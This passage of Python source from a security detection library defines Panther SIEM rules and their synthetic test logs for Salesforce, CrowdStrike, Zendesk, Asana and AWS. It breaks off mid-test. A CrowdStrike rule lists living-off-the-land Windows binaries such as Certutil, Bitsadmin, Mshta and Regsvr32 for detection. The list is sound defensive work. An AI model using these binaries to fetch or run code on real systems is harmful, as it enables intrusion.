from pypanther import LogType, Rule, RuleTest, Severity, panther_managed

salesforce_admin_login_as_user_tests: list[RuleTest] = [
    RuleTest(
        name="Normal Login Event",
        expected_result=False,
        log={
            "API_TYPE": "",
            "API_VERSION": "9998.0",
            "AUTHENTICATION_METHOD_REFERENCE": "",
            "BROWSER_TYPE": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/IP_ADDRESS_REMOVED Safari/537.36",
            "CIPHER_SUITE": "ECDHE-RSA-AES256-GCM-SHA384",
            "CLIENT_IP": "13.13.13.13",
            "CPU_TIME": 17,
            "DB_TOTAL_TIME": 19103758.0,
            "EVENT_TYPE": "Login",
            "LOGIN_KEY": "HMvXV5bu8xcZOqQl",
            "LOGIN_STATUS": "LOGIN_NO_ERROR",
            "ORGANIZATION_ID": "00D5f000005uVo7",
            "REQUEST_ID": "4pkDPOtDbNNyUOG-mNMVJ-",
            "REQUEST_STATUS": "",
            "RUN_TIME": 42,
            "SESSION_KEY": "",
            "SOURCE_IP": "12.12.12.12",
            "TIMESTAMP": "2023-05-04 21:36:47.569",
            "TIMESTAMP_DERIVED": "2023-05-04 21:36:47.569",
            "TLS_PROTOCOL": "TLSv1.2",
            "URI": "/index.jsp",
            "URI_ID_DERIVED": "",
            "USER_ID": "0055f00000CyENt",
            "USER_ID_DERIVED": "0055f00000CyENtAAN",
            "USER_NAME": "user@yourcompany.io",
            "USER_TYPE": "Standard",
            "p_any_actor_ids": ["0055f00000CyENt"],
            "p_any_emails": ["user@yourcompany.io"],
            "p_any_ip_addresses": ["12.12.12.12"],
            "p_any_trace_ids": ["4pkDPOtDbNNyUOG-mNMVJ-"],
            "p_any_usernames": ["user@yourcompany.io"],
            "p_event_time": "2023-05-04 21:36:47.569",
            "p_log_type": "Salesforce.Login",
            "p_parse_time": "2023-05-05 13:18:06.918",
            "p_row_id": "be9d5602aec3c1c0938a94fd1797cd0c",
            "p_schema_version": 0,
            "p_source_id": "c473d18f-927d-461f-9b1d-8e1f5ffa1b06",
            "p_source_label": "Salesforce - Prod",
            "p_timeline": "2023-05-04 21:36:47.569",
        },
    ),
    RuleTest(
        name="Admin Assumes User",
        expected_result=True,
        log={
            "CLIENT_IP": "12.12.12.12",
            "CPU_TIME": 19,
            "DELEGATED_USER_ID": "0054x000001L78a",
            "DELEGATED_USER_ID_DERIVED": "0054x000001L78aAAC",
            "DELEGATED_USER_NAME": "admin.user@yourcompany.io",
            "EVENT_TYPE": "LoginAs",
            "LOGIN_KEY": "n5sqLw+tah0tY/q9",
            "ORGANIZATION_ID": "000elibsdfkjsd",
            "REQUEST_ID": "4dmdpWcNWWjoaQWObxO2k-",
            "RUN_TIME": 1088,
            "SESSION_KEY": "f6wkL1crc62p7/Vj",
            "TIMESTAMP": "2021-08-19 09:05:03.392",
            "TIMESTAMP_DERIVED": "2021-08-19 09:05:03.392",
            "URI": "/secur/logout.jsp",
            "URI_ID_DERIVED": "",
            "USER_ID": "fdokawnjf",
            "USER_ID_DERIVED": "fdokawnjf",
            "p_any_ip_addresses": ["12.12.12.12"],
            "p_any_trace_ids": ["4dmdpWcNWWjoaQWObxO2k-"],
            "p_any_usernames": ["admin.user@yourcompany.io"],
            "p_event_time": "2021-08-19 09:05:03.392",
            "p_log_type": "Salesforce.LoginAs",
            "p_parse_time": "2021-08-19 11:11:32.69",
            "p_row_id": "1ac2cc960bb0ddf7dbeaeadb0ba701",
            "p_source_id": "2e4c927c-7461-4810-86fe-45f6d5c5fe5b",
            "p_source_label": "release-1-21",
        },
    ),
]


@panther_managed
class SalesforceAdminLoginAsUser(Rule):
    default_description = "Salesforce detection that alerts when an admin logs in as another user. "
    display_name = "Salesforce Admin Login As User"
    default_runbook = "Please do an indicator search on USER_ID to find which user was assumed. "
    default_reference = "https://help.salesforce.com/s/articleView?id=sf.logging_in_as_another_user.htm&type=5"
    default_severity = Severity.INFO
    log_types = [LogType.SALESFORCE_LOGIN_AS]
    id = "Salesforce.Admin.Login.As.User-prototype"
    tests = salesforce_admin_login_as_user_tests

    def rule(self, event):
        return event.get("EVENT_TYPE", "<NO_EVENT_TYPE_FOUND>") == "LoginAs"

    def title(self, event):
        admin = event.get("DELEGATED_USER_NAME", "<NO_ADMIN_FOUND>")
        user_id = event.get("USER_ID", "<NO_USER_ID_FOUND>")
        return f"Salesforce admin [{admin}] logged in as a regular user with the user id [{user_id}]."



"""Configuration values for Panther"""

from typing import Any

from pypanther.helpers import panther_config_defaults, panther_config_overrides


class Config:  # pylint: disable=too-few-public-methods
    def __getattr__(self, name) -> Any:
        if hasattr(panther_config_overrides, name):
            return getattr(panther_config_overrides, name)
        return getattr(panther_config_defaults, name, None)


config = Config()



"""Global helpers for Tines detections"""


def tines_alert_context(event) -> dict:
    a_c = {}
    a_c["actor"] = event.get("user_email", "<NO_USEREMAIL>")
    a_c["action"] = event.get("operation_name", "<NO_OPERATION>")
    a_c["tenant_id"] = event.get("tenant_id", "<NO_TENANTID>")
    a_c["user_email"] = event.get("user_email", "<NO_USEREMAIL>")
    a_c["user_id"] = event.get("user_id", "<NO_USERID>")
    a_c["operation_name"] = event.get("operation_name", "<NO_OPERATION>")
    a_c["request_ip"] = event.get("request_ip", "<NO_REQUESTIP>")
    return a_c



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import crowdstrike_process_alert_context

crowdstrike_fdrlolbas_tests: list[RuleTest] = [
    RuleTest(
        name="At Usage (Positive)",
        expected_result=True,
        log={
            "ConfigBuild": "1007.3.0016606.11",
            "ConfigStateHash": "3799024366",
            "Entitlements": "15",
            "TreeId": "4295752857",
            "aid": "877761efa8db44d792ddc2redacted",
            "aip": "1.1.1.1",
            "cid": "cfe698690964434083fecdredacted",
            "event": {
                "AuthenticationId": "293628",
                "CommandLine": '"C:\\Windows\\System32\\at.exe" at 09:00 /interactive /every:m,t,w,th,f,s,su',
                "ConfigBuild": "1007.3.0016606.11",
                "ConfigStateHash": "3799024366",
                "EffectiveTransmissionClass": "2",
                "Entitlements": "15",
                "ImageFileName": "\\Device\\HarddiskVolume2\\Windows\\System32\\at.exe",
                "ImageSubsystem": "3",
                "IntegrityLevel": "12288",
                "MD5HashData": "5fd22b915c232378e567160d641cc9f2",
                "ParentAuthenticationId": "293628",
                "ParentBaseFileName": "pwsh.exe",
                "ParentProcessId": "4370948876",
                "ProcessCreateFlags": "0",
                "ProcessEndTime": "",
                "ProcessParameterFlags": "24577",
                "ProcessStartTime": "1682106508.209",
                "ProcessSxsFlags": "64",
                "RawProcessId": "2696",
                "SHA1HashData": "0000000000000000000000000000000000000000",
                "SHA256HashData": "488e74e2026d03f21b33f470c23b3de2f466643186c2e06ae7b4883cc2e59377",
                "SessionId": "2",
                "SourceProcessId": "4370948876",
                "SourceThreadId": "6364981533",
                "Tags": "25, 27, 151, 862, 874, 924, 12094627905582, 12094627906234, 237494511599633",
                "TargetProcessId": "4389083225",
                "TokenType": "1",
                "TreeId": "4295752857",
                "UserSid": "S-1-5-21-239183934-720705223-383019856-500",
                "aid": "877761efa8db44d792ddc2redacted",
                "aip": "1.1.1.1",
                "cid": "cfe698690964434083fecdredacted",
                "event_platform": "Win",
                "event_simpleName": "ProcessRollup2",
                "id": "9a920968-f200-4dd8-8696-461217ece967",
                "name": "ProcessRollup2V19",
                "timestamp": "1682106508970",
            },
            "event_platform": "Win",
            "event_simpleName": "ProcessRollup2",
            "fdr_event_type": "ProcessRollup2",
            "id": "9a920968-f200-4dd8-8696-461217ece967",
            "name": "ProcessRollup2V19",
            "p_any_ip_addresses": ["1.1.1.1"],
            "p_any_md5_hashes": [
                "5fd22b915c232378e567160d641cc9f2",
                "877761efa8db44d792ddc2redacted",
                "cfe698690964434083fecdredacted",
            ],
            "p_any_sha1_hashes": ["0000000000000000000000000000000000000000"],
            "p_any_sha256_hashes": ["488e74e2026d03f21b33f470c23b3de2f466643186c2e06ae7b4883cc2e59377"],
            "p_any_trace_ids": ["4295752857", "877761efa8db44d792ddc2redacted", "cfe698690964434083fecdredacted"],
            "p_event_time": "2023-04-21 19:48:28.97",
            "p_log_type": "Crowdstrike.FDREvent",
            "p_parse_time": "2023-04-21 20:00:53.148",
            "p_row_id": "7ac82dbb43a99bfec196bdda17ea7f",
            "p_schema_version": 0,
            "p_source_id": "1f33f64c-124d-413c-a9e3-d51ccedd8e77",
            "p_source_label": "Crowdstrike-FDR-Dev",
            "p_timeline": "2023-04-21 19:48:28.97",
            "timestamp": "2023-04-21 19:48:28.97",
        },
    ),
    RuleTest(
        name="Notepad Usage (Negative)",
        expected_result=False,
        log={
            "ConfigBuild": "1007.3.0016606.11",
            "ConfigStateHash": "3799024366",
            "Entitlements": "15",
            "TreeId": "4295752857",
            "aid": "877761efa8db44d792ddc2redacted",
            "aip": "1.1.1.1",
            "cid": "cfe698690964434083fecdredacted",
            "event": {
                "AuthenticationId": "293628",
                "CommandLine": '"C:\\Windows\\System32\\notepad.exe" /A filename',
                "ConfigBuild": "1007.3.0016606.11",
                "ConfigStateHash": "3799024366",
                "EffectiveTransmissionClass": "2",
                "Entitlements": "15",
                "ImageFileName": "\\Device\\HarddiskVolume2\\Windows\\System32\\notepad.exe",
                "ImageSubsystem": "3",
                "IntegrityLevel": "12288",
                "MD5HashData": "5fd22b915c232378e567160d641cc9f2",
                "ParentAuthenticationId": "293628",
                "ParentBaseFileName": "pwsh.exe",
                "ParentProcessId": "4370948876",
                "ProcessCreateFlags": "0",
                "ProcessEndTime": "",
                "ProcessParameterFlags": "24577",
                "ProcessStartTime": "1682106508.209",
                "ProcessSxsFlags": "64",
                "RawProcessId": "2696",
                "SHA1HashData": "0000000000000000000000000000000000000000",
                "SHA256HashData": "488e74e2026d03f21b33f470c23b3de2f466643186c2e06ae7b4883cc2e59377",
                "SessionId": "2",
                "SourceProcessId": "4370948876",
                "SourceThreadId": "6364981533",
                "Tags": "25, 27, 151, 862, 874, 924, 12094627905582, 12094627906234, 237494511599633",
                "TargetProcessId": "4389083225",
                "TokenType": "1",
                "TreeId": "4295752857",
                "UserSid": "S-1-5-21-239183934-720705223-383019856-500",
                "aid": "877761efa8db44d792ddc2redacted",
                "aip": "1.1.1.1",
                "cid": "cfe698690964434083fecdredacted",
                "event_platform": "Win",
                "event_simpleName": "ProcessRollup2",
                "id": "9a920968-f200-4dd8-8696-461217ece967",
                "name": "ProcessRollup2V19",
                "timestamp": "1682106508970",
            },
            "event_platform": "Win",
            "event_simpleName": "ProcessRollup2",
            "fdr_event_type": "ProcessRollup2",
            "id": "9a920968-f200-4dd8-8696-461217ece967",
            "name": "ProcessRollup2V19",
            "p_any_ip_addresses": ["1.1.1.1"],
            "p_any_md5_hashes": [
                "5fd22b915c232378e567160d641cc9f2",
                "877761efa8db44d792ddc2redacted",
                "cfe698690964434083fecdredacted",
            ],
            "p_any_sha1_hashes": ["0000000000000000000000000000000000000000"],
            "p_any_sha256_hashes": ["488e74e2026d03f21b33f470c23b3de2f466643186c2e06ae7b4883cc2e59377"],
            "p_any_trace_ids": ["4295752857", "877761efa8db44d792ddc2redacted", "cfe698690964434083fecdredacted"],
            "p_event_time": "2023-04-21 19:48:28.97",
            "p_log_type": "Crowdstrike.FDREvent",
            "p_parse_time": "2023-04-21 20:00:53.148",
            "p_row_id": "7ac82dbb43a99bfec196bdda17ea7f",
            "p_schema_version": 0,
            "p_source_id": "1f33f64c-124d-413c-a9e3-d51ccedd8e77",
            "p_source_label": "Crowdstrike-FDR-Dev",
            "p_timeline": "2023-04-21 19:48:28.97",
            "timestamp": "2023-04-21 19:48:28.97",
        },
    ),
]


@panther_managed
class CrowdstrikeFDRLOLBAS(Rule):
    log_types = [LogType.CROWDSTRIKE_FDR_EVENT]
    id = "Crowdstrike.FDR.LOLBAS-prototype"
    display_name = "Crowdstrike FDR LOLBAS"
    default_description = "Living off the land binaries and script usage"
    default_reference = "https://lolbas-project.github.io/"
    dedup_period_minutes = 1440
    enabled = False
    default_severity = Severity.INFO
    tags = ["Configuration Required"]
    tests = crowdstrike_fdrlolbas_tests
    LOLBAS_EXE = {
        "AppInstaller.exe",
        "At.exe",
        "Atbroker.exe",
        "Bash.exe",
        "Bitsadmin.exe",
        "CertOC.exe",
        "CertReq.exe",
        "Certutil.exe",
        "Cmd.exe",
        "Cmdkey.exe",
        "cmdl32.exe",
        "Cmstp.exe",
        "ConfigSecurityPolicy.exe",
        "Conhost.exe",
        "Control.exe",
        "Csc.exe",
        "Cscript.exe",
        "CustomShellHost.exe",
        "DataSvcUtil.exe",
        "Desktopimgdownldr.exe",
        "DeviceCredentialDeployment.exe",
        "Dfsvc.exe",
        "Diantz.exe",
        "Diskshadow.exe",
        "Dnscmd.exe",
        "Esentutl.exe",
        "Eventvwr.exe",
        "Expand.exe",
        "Explorer.exe",
        "Extexport.exe",
        "Extrac32.exe",
        "Findstr.exe",
        "Finger.exe",
        "fltMC.exe",
        "Forfiles.exe",
        "Ftp.exe",
        "Gpscript.exe",
        "Hh.exe",
        "IMEWDBLD.exe",
        "Ie4uinit.exe",
        "Ieexec.exe",
        "Ilasm.exe",
        "Infdefaultinstall.exe",
        "Installutil.exe",
        "Jsc.exe",
        "Ldifde.exe",
        "Makecab.exe",
        "Mavinject.exe",
        "Mmc.exe",
        "MpCmdRun.exe",
        "Msbuild.exe",
        "Msconfig.exe",
        "Msdt.exe",
        "Msedge.exe",
        "Mshta.exe",
        "Msiexec.exe",
        "Netsh.exe",
        "Odbcconf.exe",
        "OfflineScannerShell.exe",
        "OneDriveStandaloneUpdater.exe",
        "Pcalua.exe",
        "Pcwrun.exe",
        "Pktmon.exe",
        "Pnputil.exe",
        "Presentationhost.exe",
        "Print.exe",
        "PrintBrm.exe",
        "Psr.exe",
        "Rasautou.exe",
        "rdrleakdiag.exe",
        "Reg.exe",
        "Regasm.exe",
        "Regedit.exe",
        "Regini.exe",
        "Regsvcs.exe",
        "Regsvr32.exe",
        "Replace.exe",
        "Rpcping.exe",
        "Rundll32.exe",
        "Runexehelper.exe",
        "Runonce.exe",
        "Runscripthelper.exe",
        "Sc.exe",
        "Schtasks.exe",
        "Scriptrunner.exe",
        "Setres.exe",
        "SettingSyncHost.exe",
        "ssh.exe",
        "Stordiag.exe",
        "SyncAppvPublishingServer.exe",
        "Ttdinject.exe",
        "Tttracer.exe",
        "Unregmp2.exe",
        "vbc.exe",
        "Verclsid.exe",
        "Wab.exe",
        "winget.exe",
        "Wlrmdr.exe",
        "Wmic.exe",
        "WorkFolders.exe",
        "Wscript.exe",
        "Wsreset.exe",
        "wuauclt.exe",
        "Xwizard.exe",
        "fsutil.exe",
        "wt.exe",
    }

    def rule(self, event):
        if event.deep_get("event", "event_simpleName") == "ProcessRollup2":
            if event.deep_get("event", "event_platform") == "Win":
                exe = event.udm("process_name")
                return bool(exe.lower() in [x.lower() for x in self.LOLBAS_EXE])
        return False

    def title(self, event):
        exe = event.deep_get("event", "ImageFileName").split("\\")[-1]
        return f"Crowdstrike: LOLBAS execution - [{exe}] - [{event.deep_get('event', 'CommandLine')}]"

    def dedup(self, event):
        # dedup string on "{aid}-{exe}"
        exe = event.udm("process_name")
        return f"{event.deep_get('event', 'aid')}-{exe}"

    def alert_context(self, event):
        return crowdstrike_process_alert_context(event)



import re

from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import ZENDESK_CHANGE_DESCRIPTION

zendesk_account_owner_changed_tests: list[RuleTest] = [
    RuleTest(
        name="Zendesk - Owner Changed",
        expected_result=True,
        log={
            "url": "https://myzendek.zendesk.com/api/v2/audit_logs/111222333444.json",
            "id": 123456789123,
            "action_label": "Updated",
            "actor_id": 123,
            "actor_name": "John Doe",
            "source_id": 123,
            "source_type": "account",
            "source_label": "Account: Account",
            "action": "update",
            "change_description": "Owner changed from Bob Cat to Mountain Lion",
            "ip_address": "127.0.0.1",
            "created_at": "2021-05-28T18:39:50Z",
            "p_log_type": "Zendesk.Audit",
        },
    ),
    RuleTest(
        name="Zendesk - Admin Role Assigned",
        expected_result=False,
        log={
            "url": "https://myzendek.zendesk.com/api/v2/audit_logs/111222333444.json",
            "id": 123456789123,
            "action_label": "Updated",
            "actor_id": 123,
            "actor_name": "John Doe",
            "source_id": 123,
            "source_type": "user",
            "source_label": "Account: Account",
            "action": "update",
            "change_description": "Role changed from End User to Administrator",
            "ip_address": "127.0.0.1",
            "created_at": "2021-05-28T18:39:50Z",
            "p_log_type": "Zendesk.Audit",
        },
    ),
]


@panther_managed
class ZendeskAccountOwnerChanged(Rule):
    id = "Zendesk.AccountOwnerChanged-prototype"
    display_name = "Zendesk Account Owner Changed"
    log_types = [LogType.ZENDESK_AUDIT]
    default_severity = Severity.HIGH
    tags = ["Zendesk", "Privilege Escalation:Valid Accounts"]
    reports = {"MITRE ATT&CK": ["TA0004:T1078"]}
    default_description = "Only one admin user can be the account owner. Ensure the change in ownership is expected."
    default_reference = "https://support.zendesk.com/hc/en-us/articles/4408822084634-Changing-the-account-owner"
    summary_attributes = ["p_any_ip_addresses"]
    tests = zendesk_account_owner_changed_tests
    ZENDESK_OWNER_CHANGED = re.compile("Owner changed from (?P<old_owner>.+) to (?P<new_owner>[^$]+)", re.IGNORECASE)

    def rule(self, event):
        if event.get("action", "") == "update" and event.get("source_type", "") == "account":
            return event.get(ZENDESK_CHANGE_DESCRIPTION, "").lower().startswith("owner changed from ")
        return False

    def title(self, event):
        old_owner = "<UNKNOWN_USER>"
        new_owner = "<UNKNOWN_USER>"
        matches = self.ZENDESK_OWNER_CHANGED.match(event.get(ZENDESK_CHANGE_DESCRIPTION, ""))
        if matches:
            old_owner = matches.group("old_owner")
            new_owner = matches.group("new_owner")
        return f"zendesk administrative owner changed from {old_owner} to {new_owner}"



import pypanther.helpers.panther_event_type_helpers as event_type
from pypanther.base import DataModel, DataModelMapping, LogType


def get_event_type(event):
    if event.get("type") == "Sign in":
        return event_type.SUCCESSFUL_LOGIN
    if event.get("type") == "Sign out":
        return event_type.SUCCESSFUL_LOGOUT
    return None


class StandardZoomActivity(DataModel):
    id: str = "Standard.Zoom.Activity"
    display_name: str = "Zoom Activity"
    enabled: bool = True
    log_types: list[str] = [LogType.ZOOM_ACTIVITY]
    mappings: list[DataModelMapping] = [
        DataModelMapping(name="actor_user", path="email"),
        DataModelMapping(name="event_type", method=get_event_type),
        DataModelMapping(name="source_ip", path="ip_address"),
    ]



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import deep_get

asana_workspace_saml_optional_tests: list[RuleTest] = [
    RuleTest(
        name="SAML required",
        expected_result=False,
        log={
            "actor": {
                "actor_type": "user",
                "email": "homer.simpson@example.io",
                "gid": "1234",
                "name": "Homer Simpson",
            },
            "context": {
                "client_ip_address": "12.12.12.12",
                "context_type": "web",
                "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
            },
            "created_at": "2022-12-16 19:31:36.289",
            "details": {"new_value": "required", "old_value": "optional"},
            "event_category": "admin_settings",
            "event_type": "workspace_saml_settings_changed",
            "gid": "1234",
            "resource": {"gid": "1234", "name": "example.io", "resource_type": "email_domain"},
        },
    ),
    RuleTest(
        name="SAML optional",
        expected_result=True,
        log={
            "actor": {
                "actor_type": "user",
                "email": "homer.simpson@example.io",
                "gid": "1234",
                "name": "Homer Simpson",
            },
            "context": {
                "client_ip_address": "12.12.12.12",
                "context_type": "web",
                "user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
            },
            "created_at": "2022-12-16 19:31:36.289",
            "details": {"new_value": "optional", "old_value": "required"},
            "event_category": "admin_settings",
            "event_type": "workspace_saml_settings_changed",
            "gid": "1234",
            "resource": {"gid": "1234", "name": "example.io", "resource_type": "email_domain"},
        },
    ),
]


@panther_managed
class AsanaWorkspaceSAMLOptional(Rule):
    default_description = "An Asana user made SAML optional for your organization."
    display_name = "Asana Workspace SAML Optional"
    default_runbook = (
        "Confirm this user acted with valid business intent and determine whether this activity was authorized."
    )
    default_reference = "https://help.asana.com/hc/en-us/articles/14075208738587-Premium-Business-and-Enterprise-authentication#gl-saml:~:text=to%20your%20organization.-,SAML,-If%20your%20company"
    default_severity = Severity.MEDIUM
    log_types = [LogType.ASANA_AUDIT]
    id = "Asana.Workspace.SAML.Optional-prototype"
    tests = asana_workspace_saml_optional_tests

    def rule(self, event):
        old_val = deep_get(event, "details", "old_value", default="<OLD_VAL_NOT_FOUND>")
        new_val = deep_get(event, "details", "new_value", default="<NEW_VAL_NOT_FOUND>")
        return all(
            [
                event.get("event_type", "<NO_EVENT_TYPE_FOUND>") == "workspace_saml_settings_changed",
                old_val == "required",
                new_val == "optional",
            ],
        )

    def title(self, event):
        actor_email = deep_get(event, "actor", "email", default="<ACTOR_NOT_FOUND>")
        return f"Asana user [{actor_email}] made SAML optional for your organization."



"""Used to simplify the use of Tor lookup table data in Rules"""

import datetime
from collections.abc import Sequence

from pypanther.helpers.panther_lookuptable_helpers import LookupTableMatches


class TorExitNodes(LookupTableMatches):
    def __init__(self, event):
        super().__init__()
        super()._register(event, "tor_exit_nodes")

    def has_exit_nodes(self):
        return bool(self.lut_matches)

    def ip_address(self, match_field) -> list or str:
        """Enrich an ip address"""
        return self._lookup(match_field, "ip")

    def url(self, match_field) -> list or str:
        """Return link to Tor database"""
        today = datetime.datetime.today().strftime("%Y-%m-%d")
        ip_address = self.ip_address(match_field)
        if isinstance(ip_address, Sequence) and not isinstance(ip_address, str):
            return [
                # pylint: disable=C0301 (line-too-long)
                f"https://metrics.torproject.org/exonerator.html?ip={list_ip_address}&timestamp={today}&lang=en"
                for list_ip_address in ip_address
            ]
        # pylint: disable=line-too-long
        return f"https://metrics.torproject.org/exonerator.html?ip={ip_address}&timestamp={today}&lang=en"

    def context(self, match_field) -> dict:
        """Create a context dictionary"""
        ip_address = self.ip_address(match_field)
        if ip_address:
            return {
                "IP": ip_address,
                "ExoneraTorURL": self.url(match_field),
            }
        return {}



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import aws_rule_context, deep_get
from pypanther.helpers.panther_default import lookup_aws_account_name

aws_console_login_without_saml_tests: list[RuleTest] = [
    RuleTest(
        name="Login with SAML",
        expected_result=False,
        log={
            "additionalEventData": {
                "LoginTo": "https://console.aws.amazon.com/console/home",
                "MobileVersion": "No",
                "MFAUsed": "No",
                "SamlProviderArn": "arn:aws:iam::123456789012:saml-provider/Okta",
            },
            "eventVersion": "1.05",
            "userIdentity": {
                "type": "AssumedRole",
                "principalId": "1111",
                "arn": "arn:aws:iam::123456789012:assumed-role/okta/tester@domain.tld",
                "accountId": "123456789012",
                "userName": "tester",
            },
            "eventTime": "2019-01-01T00:00:00Z",
            "eventSource": "signin.amazonaws.com",
            "eventName": "ConsoleLogin",
            "awsRegion": "us-east-1",
            "sourceIPAddress": "111.111.111.111",
            "userAgent": "Mozilla",
            "requestParameters": None,
            "responseElements": {"ConsoleLogin": "Success"},
            "eventID": "1",
            "eventType": "AwsConsoleSignIn",
            "recipientAccountId": "123456789012",
        },
    ),
    RuleTest(
        name="Normal Login",
        expected_result=True,
        log={
            "eventVersion": "1.05",
            "userIdentity": {
                "type": "IAMUser",
                "principalId": "1111",
                "arn": "arn:aws:iam::123456789012:user/tester",
                "accountId": "123456789012",
                "userName": "tester",
            },
            "eventTime": "2019-01-01T00:00:00Z",
            "eventSource": "signin.amazonaws.com",
            "eventName": "ConsoleLogin",
            "awsRegion": "us-east-1",
            "sourceIPAddress": "111.111.111.111",
            "userAgent": "Mozilla",
            "requestParameters": None,
            "responseElements": {"ConsoleLogin": "Failure"},
            "additionalEventData": {
                "LoginTo": "https://console.aws.amazon.com/console/",
                "MobileVersion": "No",
                "MFAUsed": "Yes",
            },
            "eventID": "1",
            "eventType": "AwsConsoleSignIn",
            "recipientAccountId": "123456789012",
        },
    ),
]


@panther_managed
class AWSConsoleLoginWithoutSAML(Rule):
    id = "AWS.Console.LoginWithoutSAML-prototype"
    display_name = "Logins Without SAML"
    enabled = False
    log_types = [LogType.AWS_CLOUDTRAIL]
    reports = {"MITRE ATT&CK": ["TA0001:T1078"]}
    tags = [
        "AWS",
        "Configuration Required",
        "Identity & Access Management",
        "Authentication",
        "Initial Access:Valid Accounts",
    ]
    default_severity = Severity.HIGH
    default_description = "An AWS console login was made without SAML/SSO."
    default_runbook = "Modify the AWS account configuration."
    default_reference = "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers_enable-console-saml.html"
    summary_attributes = ["userAgent", "sourceIpAddress", "recipientAccountId", "p_any_aws_arns"]
    tests = aws_console_login_without_saml_tests

    def rule(self, event):
        additional_event_data = event.get("additionalEventData", {})
        return (
            event.get("eventName") == "ConsoleLogin"
            and deep_get(event, "userIdentity", "type") != "AssumedRole"
            and (not additional_event_data.get("SamlProviderArn"))
        )

    def title(self, event):
        return f"AWS logins without SAML in account [{lookup_aws_account_name(event.get('recipientAccountId'))}]"

    def alert_context(self, event):
        return aws_rule_context(event)



from importlib import import_module
from pkgutil import walk_packages
from types import ModuleType
from typing import Any, List, Set, Type

from pydantic import NonNegativeInt, PositiveInt

from pypanther.base import DataModel, Rule
from pypanther.severity import Severity
from pypanther.unit_tests import RuleTest
from pypanther.utils import filter_iterable_by_kwargs

__RULES: Set[Type[Rule]] = set()
__DATA_MODELS: Set[Type[DataModel]] = set()


def get_panther_rules(
    log_types: List[str] | None = None,
    id: str | None = None,
    create_alert: bool | None = None,
    dedup_period_minutes: NonNegativeInt | None = None,
    display_name: str | None = None,
    enabled: bool | None = None,
    scheduled_queries: List[str] | None = None,
    summary_attributes: List[str] | None = None,
    tests: List[RuleTest] | None = None,
    threshold: PositiveInt | None = None,
    tags: List[str] | None = None,
    reports: dict[str, List[str]] | None = None,
    default_severity: Severity | None = None,
    default_description: str | None = None,
    default_reference: str | None = None,
    default_runbook: str | None = None,
    default_destinations: List[str] | None = None,
) -> list[Type[Rule]]:
    """
    Return an iterator of all PantherRules in the pypanther.rules based on the provided filters.
    If the filter argument is not provided, all rules are returned. If a filter value is a list, any value in the
    list will match. If a filter value is a string, the value must match exactly.
    """
    filters = locals()

    if not __RULES:
        p_a_r = import_module("pypanther.rules")
        for module_info in walk_packages(p_a_r.__path__, "pypanther.rules."):
            if len(module_info.name.split(".")) > 3:
                m = import_module(module_info.name)
                for item in dir(m):
                    attr = getattr(m, item)
                    if isinstance(attr, type) and issubclass(attr, Rule) and attr is not Rule:
                        if not hasattr(attr, "id"):
                            continue
                        __RULES.add(attr)

    return filter_iterable_by_kwargs(
        __RULES,
        **filters,
    )


def get_rules(module: Any) -> list[Type[Rule]]:
    """
    Returns a list of PantherRule subclasses that are declared within the given module, recursively.
    All sub-packages of the given module must have an __init__.py declared for PantherRule subclasses
    to be included.

    For example: if all your PantherRule subclasses are inside a "rules" folder, you would do
    ```
    import rules
    from pypanther import get_rules, register

    custom_rules = get_rules(rules)
    register(custom_rules)
    ```
    """
    if not isinstance(module, ModuleType):
        raise TypeError(f"Expected a module, got {type(module)}")

    subclasses = set()

    for module_info in walk_packages(module.__path__, prefix=module.__name__ + "."):
        m = import_module(module_info.name)

        for item in dir(m):
            attr = getattr(m, item)
            if isinstance(attr, type) and issubclass(attr, Rule) and attr is not Rule:
                if not hasattr(attr, "id"):
                    continue
                subclasses.add(attr)

    return list(subclasses)


def get_panther_data_models(**kwargs) -> list[Type[DataModel]]:
    """
    Return an iterator of all PantherDataModels in the pypanther.rules based on the provided filters.
    If the filter argument is not provided, all data models are returned. If a filter value is a list, any value in the
    list will match. If a filter value is a string, the value must match exactly.
    """
    if not __DATA_MODELS:
        p_a_d = import_module("pypanther.data_models")
        for module_info in walk_packages(p_a_d.__path__, "pypanther.data_models."):
            m = import_module(module_info.name)
            for item in dir(m):
                attr = getattr(m, item)
                if isinstance(attr, type) and issubclass(attr, DataModel) and attr is not DataModel:
                    __DATA_MODELS.add(attr)

    return filter_iterable_by_kwargs(__DATA_MODELS, **kwargs)



from fnmatch import fnmatch

from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.panther_base_helpers import aws_rule_context, deep_get
from pypanther.helpers.panther_default import aws_cloudtrail_success

aws_cloud_trail_security_configuration_change_tests: list[RuleTest] = [
    RuleTest(
        name="Security Configuration Changed",
        expected_result=True,
        log={
            "awsRegion": "us-west-2",
            "eventID": "1111",
            "eventName": "DeleteTrail",
            "eventSource": "cloudtrail.amazonaws.com",
            "eventTime": "2019-01-01T00:00:00Z",
            "eventType": "AwsApiCall",
            "eventVersion": "1.05",
            "readOnly": False,
            "recipientAccountId": "123456789012",
            "requestID": "1111",
            "requestParameters": {"name": "example-trail"},
            "responseElements": None,
            "sourceIPAddress": "111.111.111.111",
            "userAgent": "Mozilla/2.0 (compatible; NEWT ActiveX; Win32)",
            "userIdentity": {
                "accessKeyId": "1111",
                "accountId": "123456789012",
                "arn": "arn:aws:sts::123456789012:assumed-role/example-role/example-user",
                "invokedBy": "cloudformation.amazonaws.com",
                "principalId": "1111",
                "sessionContext": {
                    "attributes": {"creationDate": "2019-01-01T00:00:00Z", "mfaAuthenticated": "true"},
                    "sessionIssuer": {
                        "accountId": "123456789012",
                        "arn": "arn:aws:iam::123456789012:role/example-role",
                        "principalId": "1111",
                        "type": "Role",
                        "userName": "example-role",
                    },
                    "webIdFederationData": {},
                },
                "type": "AssumedRole",
            },
        },
    ),
    RuleTest(
        name="Security Configuration Not Changed",
